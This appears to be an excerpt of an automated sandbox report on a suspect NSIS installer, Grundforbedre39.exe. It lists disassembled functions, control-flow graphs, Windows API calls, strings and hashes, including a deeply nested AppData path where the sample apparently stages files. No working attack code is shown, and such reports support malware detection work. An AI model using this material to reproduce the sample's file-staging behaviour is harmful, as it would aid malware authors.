                                                                                      • Associated: 00000000.00000002.1133176820.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                      • String ID: "C:\Users\user\Desktop\Grundforbedre39.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Grundforbedre39.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                      • API String ID: 4283519449-108289670
                                                                                      • Opcode ID: 122f358f8e6717933ee25f5196e07cf05b6efbf44d0d507e84cb61a679add872
                                                                                      • Instruction ID: 8ad5d6c736a045239d332ae2f481ce07f868331e1a87cba88ca9eb01e54a75c5
                                                                                      • Opcode Fuzzy Hash: 122f358f8e6717933ee25f5196e07cf05b6efbf44d0d507e84cb61a679add872
                                                                                      • Instruction Fuzzy Hash: 0651E671940206ABDB209F64DE89B9E7BB8EB04394F10407BF904B72D1C7BC9D419BAD
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0040603C Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 207stringCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 427 40603c-406047 428 406049-406058 427->428 429 40605a-406070 427->429 428->429 430 406076-406083 429->430 431 406288-40628e 429->431 430->431 434 406089-406090 430->434 432 406294-40629f 431->432 433 406095-4060a2 431->433 435 4062a1-4062a5 call 40601a 432->435 436 4062aa-4062ab 432->436 433->432 437 4060a8-4060b4 433->437 434->431 435->436 439 406275 437->439 440 4060ba-4060f6 437->440 441 406283-406286 439->441 442 406277-406281 439->442 443 406216-40621a 440->443 444 4060fc-406107 GetVersion 440->444 441->431 442->431 447 40621c-406220 443->447 448 40624f-406253 443->448 445 406121 444->445 446 406109-40610d 444->446 452 406128-40612f 445->452 446->445 449 40610f-406113 446->449 450 406230-40623d call 40601a 447->450 451 406222-40622e call 405f61 447->451 453 406262-406273 lstrlenW 448->453 454 406255-40625d call 40603c 448->454 449->445 455 406115-406119 449->455 465 406242-40624b 450->465 451->465 457 406131-406133 452->457 458 406134-406136 452->458 453->431 454->453 455->445 461 40611b-40611f 455->461 457->458 463 406172-406175 458->463 464 406138-40615e call 405ee7 458->464 461->452 468 406185-406188 463->468 469 406177-406183 GetSystemDirectoryW 463->469 476 406164-40616d call 40603c 464->476 477 4061fd-406201 464->477 465->453 467 40624d 465->467 474 40620e-406214 call 4062ae 467->474 471 4061f3-4061f5 468->471 472 40618a-406198 GetWindowsDirectoryW 468->472 470 4061f7-4061fb 469->470 470->474 470->477 471->470 475 40619a-4061a4 471->475 472->471 474->453 480 4061a6-4061a9 475->480 481 4061be-4061d4 SHGetSpecialFolderLocation 475->481 476->470 477->474 483 406203-406209 lstrcatW 477->483 480->481 484 4061ab-4061b2 480->484 485 4061d6-4061ed SHGetPathFromIDListW CoTaskMemFree 481->485 486 4061ef 481->486 483->474 488 4061ba-4061bc 484->488 485->470 485->486 486->471 488->470 488->481
                                                                                      APIs
                                                                                      • GetVersion.KERNEL32(00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsoA79F.tmp\System.dll,?,004051B0,Skipped: C:\Users\user\AppData\Local\Temp\nsoA79F.tmp\System.dll,00000000,00000000,0040FEA0), ref: 004060FF
                                                                                      • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 0040617D
                                                                                      • GetWindowsDirectoryW.KERNEL32(Call,00000400), ref: 00406190
                                                                                      • SHGetSpecialFolderLocation.SHELL32(?,?), ref: 004061CC
                                                                                      • SHGetPathFromIDListW.SHELL32(?,Call), ref: 004061DA
                                                                                      • CoTaskMemFree.OLE32(?), ref: 004061E5
                                                                                      • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00406209
                                                                                      • lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsoA79F.tmp\System.dll,?,004051B0,Skipped: C:\Users\user\AppData\Local\Temp\nsoA79F.tmp\System.dll,00000000,00000000,0040FEA0), ref: 00406263
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1132844226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1132810286.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132879796.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1133176820.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                                                      • String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nsoA79F.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                      • API String ID: 900638850-589119129
                                                                                      • Opcode ID: b8d500f1d66d49f60ce4f806ef01b9aacec72cf8db940e2808a27d94a3ad851c
                                                                                      • Instruction ID: f6a8a8a7a7034b932088a9542e42f1195f789c387e9fc15d08c952313e2c7fd4
                                                                                      • Opcode Fuzzy Hash: b8d500f1d66d49f60ce4f806ef01b9aacec72cf8db940e2808a27d94a3ad851c
                                                                                      • Instruction Fuzzy Hash: 5C612671A00105EBDF209F64CC40AAE37A5BF51314F52817FE916BA2E1D73D8AA2CB5D
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00401767 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145stringtimeCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 753 401767-40178c call 402bbf call 405a45 758 401796-4017a8 call 40601a call 4059ce lstrcatW 753->758 759 40178e-401794 call 40601a 753->759 764 4017ad-4017ae call 4062ae 758->764 759->764 768 4017b3-4017b7 764->768 769 4017b9-4017c3 call 40635d 768->769 770 4017ea-4017ed 768->770 777 4017d5-4017e7 769->777 778 4017c5-4017d3 CompareFileTime 769->778 772 4017f5-401811 call 405bef 770->772 773 4017ef-4017f0 call 405bca 770->773 780 401813-401816 772->780 781 401885-4018ae call 405179 call 403027 772->781 773->772 777->770 778->777 783 401867-401871 call 405179 780->783 784 401818-401856 call 40601a * 2 call 40603c call 40601a call 40575f 780->784 794 4018b0-4018b4 781->794 795 4018b6-4018c2 SetFileTime 781->795 796 40187a-401880 783->796 784->768 815 40185c-40185d 784->815 794->795 798 4018c8-4018d3 CloseHandle 794->798 795->798 799 402a55 796->799 801 4018d9-4018dc 798->801 802 402a4c-402a4f 798->802 803 402a57-402a5b 799->803 805 4018f1-4018f4 call 40603c 801->805 806 4018de-4018ef call 40603c lstrcatW 801->806 802->799 812 4018f9-40228d call 40575f 805->812 806->812 812->803 815->796 817 40185f-401860 815->817 817->783
                                                                                      APIs
                                                                                      • lstrcatW.KERNEL32(00000000,00000000), ref: 004017A8
                                                                                      • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Afskrkkelsesvaabnet84\Fodboldenke\biltyven\Subfastigiate\Felaheen\Tilb,?,?,00000031), ref: 004017CD
                                                                                        • Part of subcall function 0040601A: lstrcpynW.KERNEL32(?,?,00000400,00403317,00428200,NSIS Error), ref: 00406027
                                                                                        • Part of subcall function 00405179: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsoA79F.tmp\System.dll,00000000,0040FEA0,00000000,?,?,?,?,?,?,?,?,?,00403160,00000000,?), ref: 004051B1
                                                                                        • Part of subcall function 00405179: lstrlenW.KERNEL32(00403160,Skipped: C:\Users\user\AppData\Local\Temp\nsoA79F.tmp\System.dll,00000000,0040FEA0,00000000,?,?,?,?,?,?,?,?,?,00403160,00000000), ref: 004051C1
                                                                                        • Part of subcall function 00405179: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsoA79F.tmp\System.dll,00403160), ref: 004051D4
                                                                                        • Part of subcall function 00405179: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsoA79F.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsoA79F.tmp\System.dll), ref: 004051E6
                                                                                        • Part of subcall function 00405179: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040520C
                                                                                        • Part of subcall function 00405179: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405226
                                                                                        • Part of subcall function 00405179: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405234
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1132844226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1132810286.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132879796.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1133176820.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\nsoA79F.tmp$C:\Users\user\AppData\Local\Temp\nsoA79F.tmp\System.dll$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Afskrkkelsesvaabnet84\Fodboldenke\biltyven\Subfastigiate\Felaheen\Tilb$Call
                                                                                      • API String ID: 1941528284-1615189334
                                                                                      • Opcode ID: 002dd4f96bdd12a9be5d665e019e1aa7de7c915f3f58c6e3467a44ba116e215f
                                                                                      • Instruction ID: c9b8be7f26e3bb8f886377ec20d84860bb913b523593c9fc4340e73ed15d4a17
                                                                                      • Opcode Fuzzy Hash: 002dd4f96bdd12a9be5d665e019e1aa7de7c915f3f58c6e3467a44ba116e215f
                                                                                      • Instruction Fuzzy Hash: 0041D531900114FACF20BFB5CC45EAE3A79EF45369B20423BF022B10E2D73C8A119A6D
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00405179 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72stringwindowCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 819 405179-40518e 820 405194-4051a5 819->820 821 405245-405249 819->821 822 4051b0-4051bc lstrlenW 820->822 823 4051a7-4051ab call 40603c 820->823 825 4051d9-4051dd 822->825 826 4051be-4051ce lstrlenW 822->826 823->822 828 4051ec-4051f0 825->828 829 4051df-4051e6 SetWindowTextW 825->829 826->821 827 4051d0-4051d4 lstrcatW 826->827 827->825 830 4051f2-405234 SendMessageW * 3 828->830 831 405236-405238 828->831 829->828 830->831 831->821 832 40523a-40523d 831->832 832->821
                                                                                      APIs
                                                                                      • lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsoA79F.tmp\System.dll,00000000,0040FEA0,00000000,?,?,?,?,?,?,?,?,?,00403160,00000000,?), ref: 004051B1
                                                                                      • lstrlenW.KERNEL32(00403160,Skipped: C:\Users\user\AppData\Local\Temp\nsoA79F.tmp\System.dll,00000000,0040FEA0,00000000,?,?,?,?,?,?,?,?,?,00403160,00000000), ref: 004051C1
                                                                                      • lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsoA79F.tmp\System.dll,00403160), ref: 004051D4
                                                                                      • SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsoA79F.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsoA79F.tmp\System.dll), ref: 004051E6
                                                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040520C
                                                                                      • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405226
                                                                                      • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405234
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1132844226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1132810286.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132879796.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1133176820.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                      • String ID: Skipped: C:\Users\user\AppData\Local\Temp\nsoA79F.tmp\System.dll
                                                                                      • API String ID: 2531174081-1221101177
                                                                                      • Opcode ID: f0736de6b77852687f6af56d99953fc3f04ffb9a82c0cfa673b58ad5bb6d8165
                                                                                      • Instruction ID: 28a23e93becb388afe58fbbf22e110c81461cbae08fd60e06f08ac54b892b673
                                                                                      • Opcode Fuzzy Hash: f0736de6b77852687f6af56d99953fc3f04ffb9a82c0cfa673b58ad5bb6d8165
                                                                                      • Instruction Fuzzy Hash: 3C218E31900158BBCB219F95DD84ADFBFB8EF55350F10807AF904B62A0C7794A518F68
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00405648 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 39COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 833 405648-405693 CreateDirectoryW 834 405695-405697 833->834 835 405699-4056a6 GetLastError 833->835 836 4056c0-4056c2 834->836 835->836 837 4056a8-4056bc SetFileSecurityW 835->837 837->834 838 4056be GetLastError 837->838 838->836
                                                                                      APIs
                                                                                      • CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 0040568B
                                                                                      • GetLastError.KERNEL32 ref: 0040569F
                                                                                      • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 004056B4
                                                                                      • GetLastError.KERNEL32 ref: 004056BE
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1132844226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1132810286.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132879796.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1133176820.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$s@
                                                                                      • API String ID: 3449924974-2404651315
                                                                                      • Opcode ID: 1b08ca72398e2981408f93d34e223770c5590cbaa7956eb772955fb128fddff0
                                                                                      • Instruction ID: 58cf5789918ac3341f57974bf76304b0811093b13c64c6dd82c549f991abc1cf
                                                                                      • Opcode Fuzzy Hash: 1b08ca72398e2981408f93d34e223770c5590cbaa7956eb772955fb128fddff0
                                                                                      • Instruction Fuzzy Hash: 6D010871D14219DAEF119FA0D8487EFBFB8EF14354F40853AE909B6190D3799604CFAA
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 004025E5 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 151fileCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 839 4025e5-4025fa call 402ba2 842 402600-402607 839->842 843 402a4c-402a4f 839->843 844 402609 842->844 845 40260c-40260f 842->845 846 402a55-402a5b 843->846 844->845 847 402773-40277b 845->847 848 402615-402624 call 405f7a 845->848 847->843 848->847 852 40262a 848->852 853 402630-402634 852->853 854 4026c9-4026cc 853->854 855 40263a-402655 ReadFile 853->855 857 4026e4-4026f4 call 405c72 854->857 858 4026ce-4026d1 854->858 855->847 856 40265b-402660 855->856 856->847 859 402666-402674 856->859 857->847 866 4026f6 857->866 858->857 860 4026d3-4026de call 405cd0 858->860 862 40267a-40268c MultiByteToWideChar 859->862 863 40272f-40273b call 405f61 859->863 860->847 860->857 862->866 867 40268e-402691 862->867 863->846 870 4026f9-4026fc 866->870 871 402693-40269e 867->871 870->863 873 4026fe-402703 870->873 871->870 874 4026a0-4026c5 SetFilePointer MultiByteToWideChar 871->874 875 402740-402744 873->875 876 402705-40270a 873->876 874->871 877 4026c7 874->877 879 402761-40276d SetFilePointer 875->879 880 402746-40274a 875->880 876->875 878 40270c-40271f 876->878 877->866 878->847 881 402721-402727 878->881 879->847 882 402752-40275f 880->882 883 40274c-402750 880->883 881->853 884 40272d 881->884 882->847 883->879 883->882 884->847
                                                                                      APIs
                                                                                      • ReadFile.KERNELBASE(?,?,?,?), ref: 0040264D
                                                                                      • MultiByteToWideChar.KERNEL32(?,?,?,?,?,00000001), ref: 00402688
                                                                                      • SetFilePointer.KERNELBASE(?,?,?,00000001,?,?,?,?,?,00000001), ref: 004026AB
                                                                                      • MultiByteToWideChar.KERNEL32(?,?,?,00000000,?,00000001,?,00000001,?,?,?,?,?,00000001), ref: 004026C1
                                                                                        • Part of subcall function 00405CD0: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405CE6
                                                                                      • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 0040276D
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1132844226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1132810286.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132879796.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1133176820.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                      • String ID: 9
                                                                                      • API String ID: 163830602-2366072709
                                                                                      • Opcode ID: fd3803aa03de2e8909da2f617b558eaad47c0c0dea7754e7ccd67b1cd56bd7db
                                                                                      • Instruction ID: af7b16596185cfa7f969e470bfe402a155c7c568a05af23699f2fbc440ccd5d4
                                                                                      • Opcode Fuzzy Hash: fd3803aa03de2e8909da2f617b558eaad47c0c0dea7754e7ccd67b1cd56bd7db
                                                                                      • Instruction Fuzzy Hash: DF514A74D00219AADF209F94C988AAEB779FF04304F50447BE501F72D0D7B89D42DB69
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00406384 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 885 406384-4063a4 GetSystemDirectoryW 886 4063a6 885->886 887 4063a8-4063aa 885->887 886->887 888 4063bb-4063bd 887->888 889 4063ac-4063b5 887->889 891 4063be-4063f1 wsprintfW LoadLibraryExW 888->891 889->888 890 4063b7-4063b9 889->890 890->891
                                                                                      APIs
                                                                                      • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0040639B
                                                                                      • wsprintfW.USER32 ref: 004063D6
                                                                                      • LoadLibraryExW.KERNELBASE(?,00000000,?), ref: 004063EA
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1132844226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1132810286.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132879796.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1133176820.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                      • String ID: %s%S.dll$UXTHEME$\
                                                                                      • API String ID: 2200240437-1946221925
                                                                                      • Opcode ID: 593f7811ea388f5a47145f6632eb7b382babc1da37006913c6aa5b6fd682aae8
                                                                                      • Instruction ID: 69ae2dd3acfd93707f2d49264f8241546f9c5af57f384429b5f7a638f8549ddd
                                                                                      • Opcode Fuzzy Hash: 593f7811ea388f5a47145f6632eb7b382babc1da37006913c6aa5b6fd682aae8
                                                                                      • Instruction Fuzzy Hash: 6BF0B170910119A7DF14A764DC0DF9B366CA700744F604476AA07F11D1EB7CEB65C7E9
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00403027 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 155COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 892 403027-40303e 893 403040 892->893 894 403047-40304f 892->894 893->894 895 403051 894->895 896 403056-40305b 894->896 895->896 897 40306b-403078 call 40320c 896->897 898 40305d-403066 call 403222 896->898 902 4031c3 897->902 903 40307e-403082 897->903 898->897 906 4031c5-4031c6 902->906 904 403088-4030a8 GetTickCount call 406513 903->904 905 4031ac-4031ae 903->905 918 403202 904->918 920 4030ae-4030b6 904->920 908 4031b0-4031b3 905->908 909 4031f7-4031fb 905->909 907 403205-403209 906->907 911 4031b5 908->911 912 4031b8-4031c1 call 40320c 908->912 913 4031c8-4031ce 909->913 914 4031fd 909->914 911->912 912->902 926 4031ff 912->926 916 4031d0 913->916 917 4031d3-4031e1 call 40320c 913->917 914->918 916->917 917->902 929 4031e3-4031ef call 405ca1 917->929 918->907 923 4030b8 920->923 924 4030bb-4030c9 call 40320c 920->924 923->924 924->902 930 4030cf-4030d8 924->930 926->918 935 4031f1-4031f4 929->935 936 4031a8-4031aa 929->936 932 4030de-4030fb call 406533 930->932 938 403101-403118 GetTickCount 932->938 939 4031a4-4031a6 932->939 935->909 936->906 940 403163-403165 938->940 941 40311a-403122 938->941 939->906 944 403167-40316b 940->944 945 403198-40319c 940->945 942 403124-403128 941->942 943 40312a-40315b MulDiv wsprintfW call 405179 941->943 942->940 942->943 951 403160 943->951 948 403180-403186 944->948 949 40316d-403172 call 405ca1 944->949 945->920 946 4031a2 945->946 946->918 950 40318c-403190 948->950 954 403177-403179 949->954 950->932 953 403196 950->953 951->940 953->918 954->936 955 40317b-40317e 954->955 955->950
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1132844226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1132810286.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132879796.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
